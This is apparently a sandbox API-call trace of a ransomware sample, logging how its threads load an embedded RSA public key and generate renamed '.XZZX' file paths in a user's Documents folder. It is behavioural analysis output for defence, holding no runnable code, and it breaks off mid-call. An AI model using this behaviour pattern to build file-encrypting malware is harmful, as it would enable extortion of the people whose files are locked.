param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\1B49D0D52A00521DE10DAFA32E183665.XZZX") returned 102 [0105.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0105.062] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\50D603FA297127922BA3B9132D920BDA.XZZX") returned 102 [0105.062] StrStrW (lpFirst="1B49D0D52A00521DE10DAFA32E183665.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 296 os_tid = 0x658 [0105.217] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.217] lstrcpyW (in: lpString1=0x420f460, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0105.217] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.217] SetErrorMode (uMode=0x1) returned 0x1 [0105.217] lstrcpyW (in: lpString1=0x420f860, lpString2="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" | out: lpString1="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX" [0105.217] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xbb75a63, Data2=0x4efc, Data3=0x4703, Data4=([0]=0xa7, [1]=0x59, [2]=0xb1, [3]=0xe5, [4]=0x66, [5]=0x3b, [6]=0x8b, [7]=0x2))) returned 0x0 [0105.217] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX") returned 102 [0105.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0105.217] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\6607237415E8D0F40BB75A631A09B53C.XZZX") returned 102 [0105.217] StrStrW (lpFirst="240D5DC448CDCC4A47DE5EDE4CE5B092.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 297 os_tid = 0x694 [0105.371] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.371] lstrcpyW (in: lpString1=0x420f460, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0105.371] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.371] SetErrorMode (uMode=0x1) returned 0x1 [0105.371] lstrcpyW (in: lpString1=0x420f860, lpString2="2525214410F7DA278BE33B7C150FBE6F.XZZX" | out: lpString1="2525214410F7DA278BE33B7C150FBE6F.XZZX") returned="2525214410F7DA278BE33B7C150FBE6F.XZZX" [0105.371] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa1e20c98, Data2=0xa04a, Data3=0x427e, Data4=([0]=0xac, [1]=0x70, [2]=0x32, [3]=0x3b, [4]=0x55, [5]=0xe3, [6]=0x81, [7]=0x2d))) returned 0x0 [0105.371] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\2525214410F7DA278BE33B7C150FBE6F.XZZX") returned 102 [0105.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0105.371] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\1336A3F029A1F86CA1E20C982DC2DCB4.XZZX") returned 102 [0105.371] StrStrW (lpFirst="2525214410F7DA278BE33B7C150FBE6F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 298 os_tid = 0x6b0 [0105.525] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.525] lstrcpyW (in: lpString1=0x420f460, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0105.525] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.525] SetErrorMode (uMode=0x1) returned 0x1 [0105.525] lstrcpyW (in: lpString1=0x420f860, lpString2="3D3271B13FFA5012E003EAB54427345A.XZZX" | out: lpString1="3D3271B13FFA5012E003EAB54427345A.XZZX") returned="3D3271B13FFA5012E003EAB54427345A.XZZX" [0105.525] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xce67cb61, Data2=0xe651, Data3=0x457a, Data4=([0]=0xbe, [1]=0x5e, [2]=0xab, [3]=0xd6, [4]=0xfb, [5]=0x4b, [6]=0xb6, [7]=0xf8))) returned 0x0 [0105.525] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\3D3271B13FFA5012E003EAB54427345A.XZZX") returned 102 [0105.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0105.525] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\8F907FB13E81979ACE67CB6142A27BE2.XZZX") returned 102 [0105.525] StrStrW (lpFirst="3D3271B13FFA5012E003EAB54427345A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 299 os_tid = 0x6c8 [0105.681] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.681] lstrcpyW (in: lpString1=0x420f460, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0105.681] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.681] SetErrorMode (uMode=0x1) returned 0x1 [0105.681] lstrcpyW (in: lpString1=0x420f860, lpString2="4718805A3B556C301085A1313FC25078.XZZX" | out: lpString1="4718805A3B556C301085A1313FC25078.XZZX") returned="4718805A3B556C301085A1313FC25078.XZZX" [0105.681] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x9ac589f, Data2=0x9894, Data3=0x4e81, Data4=([0]=0x8c, [1]=0x2b, [2]=0x27, [3]=0x4a, [4]=0x7, [5]=0x94, [6]=0x65, [7]=0x60))) returned 0x0 [0105.681] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\4718805A3B556C301085A1313FC25078.XZZX") returned 102 [0105.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0105.682] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\EC41A3EC2EC9FA9409AC589F32EADEDC.XZZX") returned 102 [0105.682] StrStrW (lpFirst="4718805A3B556C301085A1313FC25078.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 300 os_tid = 0x6e0 [0105.837] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.837] lstrcpyW (in: lpString1=0x420f460, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0105.837] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.837] SetErrorMode (uMode=0x1) returned 0x1 [0105.837] lstrcpyW (in: lpString1=0x420f860, lpString2="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" | out: lpString1="8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned="8441A0B23FA9B9126D832A0D43D69D5A.XZZX" [0105.837] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x62b196e4, Data2=0x30ae, Data3=0x4a03, Data4=([0]=0xb1, [1]=0xbb, [2]=0x87, [3]=0xfc, [4]=0xf5, [5]=0x46, [6]=0xcc, [7]=0x9))) returned 0x0 [0105.837] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\8441A0B23FA9B9126D832A0D43D69D5A.XZZX") returned 102 [0105.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0105.837] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\60FF4EF80E12DE0A62B196E41233C252.XZZX") returned 102 [0105.837] StrStrW (lpFirst="8441A0B23FA9B9126D832A0D43D69D5A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 301 os_tid = 0x700 [0105.992] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0105.992] lstrcpyW (in: lpString1=0x420f460, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0105.992] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0105.992] SetErrorMode (uMode=0x1) returned 0x1 [0105.993] lstrcpyW (in: lpString1=0x420f860, lpString2="A0DC431228DE1E088FD30DB72CF60250.XZZX" | out: lpString1="A0DC431228DE1E088FD30DB72CF60250.XZZX") returned="A0DC431228DE1E088FD30DB72CF60250.XZZX" [0105.993] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x9374a9ee, Data2=0x8827, Data3=0x4319, Data4=([0]=0xb3, [1]=0xf0, [2]=0x42, [3]=0x2e, [4]=0x33, [5]=0x8f, [6]=0x81, [7]=0xf0))) returned 0x0 [0105.993] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\A0DC431228DE1E088FD30DB72CF60250.XZZX") returned 102 [0105.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0105.993] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\710C534223AF80CF9374A9EE27D06517.XZZX") returned 102 [0105.993] StrStrW (lpFirst="A0DC431228DE1E088FD30DB72CF60250.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 302 os_tid = 0x714 [0106.149] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.149] lstrcpyW (in: lpString1=0x420f460, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0106.149] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0106.149] SetErrorMode (uMode=0x1) returned 0x1 [0106.149] lstrcpyW (in: lpString1=0x420f860, lpString2="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" | out: lpString1="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX" [0106.149] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x49dcb14b, Data2=0x94cd, Data3=0x4ef1, Data4=([0]=0xab, [1]=0x19, [2]=0x86, [3]=0x1, [4]=0xa3, [5]=0x15, [6]=0x2b, [7]=0xa1))) returned 0x0 [0106.149] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\B4A323B51740B3FD1D50DD1D1B6D9845.XZZX") returned 102 [0106.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0106.149] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\BC39550F2DE28AFD49DCB14B32036F45.XZZX") returned 102 [0106.149] StrStrW (lpFirst="B4A323B51740B3FD1D50DD1D1B6D9845.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 303 os_tid = 0x71c [0106.305] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0106.305] lstrcpyW (in: lpString1=0x420f460, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0106.305] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\" [0106.305] SetErrorMode (uMode=0x1) returned 0x1 [0106.305] lstrcpyW (in: lpString1=0x420f860, lpString2="EE9B10B00F697CE4836159F013D6612C.XZZX" | out: lpString1="EE9B10B00F697CE4836159F013D6612C.XZZX") returned="EE9B10B00F697CE4836159F013D6612C.XZZX" [0106.305] CoCreateGuid (in: pguid=0x420e440 | out: 